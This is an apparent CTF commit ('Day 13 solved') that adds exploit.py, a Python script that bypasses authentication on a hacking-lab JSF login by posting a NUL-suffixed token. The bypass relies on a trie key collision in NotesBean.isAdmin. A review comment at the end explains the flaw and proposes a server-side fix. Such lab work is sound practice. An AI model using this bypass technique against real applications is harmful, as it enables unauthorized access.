
Day 13 solved

Roman Hergenreder 4 years ago
parent
commit
97efd59a23
2 changed files with 48 additions and 12 deletions
  1. 14 12
      Day 13/NotesBean.java
  2. 34 0
      Day 13/exploit.py

+ 14 - 12
Day 13/NotesBean.java

@@ -16,7 +16,7 @@ import org.apache.commons.io.IOUtils;
 public class NotesBean implements Serializable {
 
 	/**
-	 *
+	 * 
 	 */
 	private PatriciaTrie<Integer> trie = init();
 	private static final long serialVersionUID = 1L;
@@ -42,18 +42,20 @@ public class NotesBean implements Serializable {
 	public void setTrie(String note) {
 		trie.put(unescapeJava(note), 0);
 	}
+		
+    private static PatriciaTrie<Integer> init(){
+        PatriciaTrie<Integer> trie = new PatriciaTrie<Integer>();
+        trie.put(securitytoken,0);
 
-  private static PatriciaTrie<Integer> init(){
-    PatriciaTrie<Integer> trie = new PatriciaTrie<Integer>();
-    trie.put(securitytoken,0);
-    return trie;
-  }
+        return trie;
+    }
 
-  private static boolean isAdmin(PatriciaTrie<Integer> trie){
-    return !trie.containsKey(securitytoken);
-  }
+    private static boolean isAdmin(PatriciaTrie<Integer> trie){
+        return !trie.containsKey(securitytoken);
+    }
+
+    private static InputStream getStreamFromResourcesFolder(String filePath) {
+    	  return Thread.currentThread().getContextClassLoader().getResourceAsStream(filePath);
+    	 }
 
-  private static InputStream getStreamFromResourcesFolder(String filePath) {
-  	return Thread.currentThread().getContextClassLoader().getResourceAsStream(filePath);
-  }
 }

+ 34 - 0
Day 13/exploit.py

@@ -0,0 +1,34 @@
+#!/usr/bin/python
+
+import requests
+from bs4 import BeautifulSoup as bs
+
+URL = "http://whale.hacking-lab.com:8888/trieme/index.xhtml"
+
+session = requests.session()
+
+# Get view state
+response = session.get(URL)
+if response.status_code != 200:
+    print("Server returned %d %s" % (response.status_code, response.reason))
+    exit(1)
+
+html = bs(response.text, 'lxml')
+viewState = html.find("input", { "id": "javax.faces.ViewState" })
+if viewState is None:
+    print("Could not find javax.faces.ViewState")
+    exit(2)
+
+params = {
+    "j_idt14": "j_idt14",
+    "j_idt14:j_idt15": "login",
+    "j_idt14:name": "auth_token_4835989\0",
+    "javax.faces.ViewState": viewState['value']
+}
+
+response = session.post(URL, data=params)
+if response.status_code != 200:
+    print("Server returned %d %s" % (response.status_code, response.reason))
+    exit(1)
+
+print(response.text)
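Review bot: The value sent as `j_idt14:name` ends in a NUL (`\0`) and nothing in the script says why, so the write-up never records which server-side flaw the request depends on. Judging from NotesBean.java in this same commit, `setTrie` puts request-supplied text into the same trie that `isAdmin` later tests with `!trie.containsKey(securitytoken)`, so presumably the NUL-suffixed key is treated as colliding with the stored token; a comment such as `# NUL-suffixed key: relies on the trie treating it as a collision with the stored token (see NotesBean.isAdmin)` above the `params` dict would capture that. The lasting fix is on the server side: the admin decision should not be derived from a collection that request input can write to. Separately, `session.get(URL)` and `session.post(URL, data=params)` are called without `timeout=`, so a stalled server hangs the script indefinitely.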